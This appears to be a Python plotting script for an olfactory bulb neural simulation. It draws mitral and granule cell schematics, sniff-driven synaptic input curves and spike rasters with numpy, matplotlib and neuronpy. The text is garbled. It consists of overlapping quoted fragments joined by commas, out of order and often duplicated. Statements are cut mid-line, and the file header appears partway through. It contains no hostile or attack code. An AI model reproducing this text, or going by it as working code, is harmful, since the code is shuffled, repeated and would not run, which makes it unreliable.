numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b", "raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0 for i in", "utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\"", "= os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim", "\\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright,", "syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\", "interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\",", "read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([])", "\\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx", "in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 =", "[9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2)", "import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import", "sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref,", "neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import spiketrain from params", ") syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break", "draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright',", "ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes", "from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1,", "marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def", "draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output", "raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]],", "\\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data',", "verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28),", "numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225])", "EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for", "= -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color,", ") sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width,", "mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4)", "pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import spiketrain", "dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma", "in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents()", "\\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc],", "= int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx +=", "ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 #", "= gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\", "\\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio =", "ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color,", "cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)):", "in breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] +=", "sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'],", "= synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in", "color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9],", "comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o',", "xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\", "numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for m in", "for i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red')", "span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2)", "draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx =", "bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt =", "M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20,", "syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto", "= syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)',", "ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks)", "delays = read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0", "sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('',", "for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim)", "syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event',", "arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark", "fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an", "data = [] for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1])", "draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'],", "'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]]", "= syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'],", "ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--',", "# Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events =", "gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^',", "\\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\", "int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1", "and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7],", "cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc,", "# Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.):", "= numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for m", "synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids:", "mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for", "horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if breath_events[i] >", "xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21,", "raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx +=", "= 0 # for i in mask_a: # if i == 1: #", "numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx", "draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir", "syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') #", "for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in", "= schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)',", "'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for m in M:", "[0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg", "# Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.)", ".102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i", "syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff", "color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos =", "= fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax,", "interval for i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2,", "+= EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue')", "= wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20", "x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\", "loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in", "cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc =", "# idx += 1 idx = 0 for i in mask_b: if i", "dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx", "# -*- coding: utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011", "xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def", "(10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax =", "wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc =", "\\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\", "nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts =", "sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3)", "break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft", "\\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color,", "ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents():", "#raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11)", ".28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 -", "in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx", "schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes", "pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0],", "syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215,", "ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt'))", "ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)):", "mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx +=", "sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False)", "syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure,", "= numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color,", "ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def", "sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp,", "ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for", "pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red')", "wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc =", "1 idx = 0 for i in mask_b: if i == 1: if", "= pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax,", "- \"\"\" import os import numpy from matplotlib import pyplot from neuronpy.graphics import", "raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline')", "if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\", "sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\", "format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot(", "raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02,", "transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position()", "= numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b", "b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx =", "xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp(", "import spikeplot from bulbspikes import * from neuronpy.util import spiketrain from params import", "color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws", "marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([])", "xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff", "textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center',", "b in breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:]", "data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)):", "arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\", "[9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc],", "color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes =", "syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes", "'+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)):", "1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval", "color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90]", "= read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1] x =", "read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt)", "= 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 =", "xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width,", "yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec", "i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') #", "Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os import", "# Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color)", "breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim)", "color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt,", "idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath", "os import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes", "= fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze", "xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%',", "1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55", "xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay", "sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025,", "= numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.))", "import os import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from", "1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt)", "i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx =", "gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False)", "= syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt =", "1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events:", "pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair)", "ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc =", "in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1],", "i in mask_b: if i == 1: if comp[idx] >= xlim[0] and comp[idx]", "ax, color='black',scale=1.): \"\"\"Draw granule 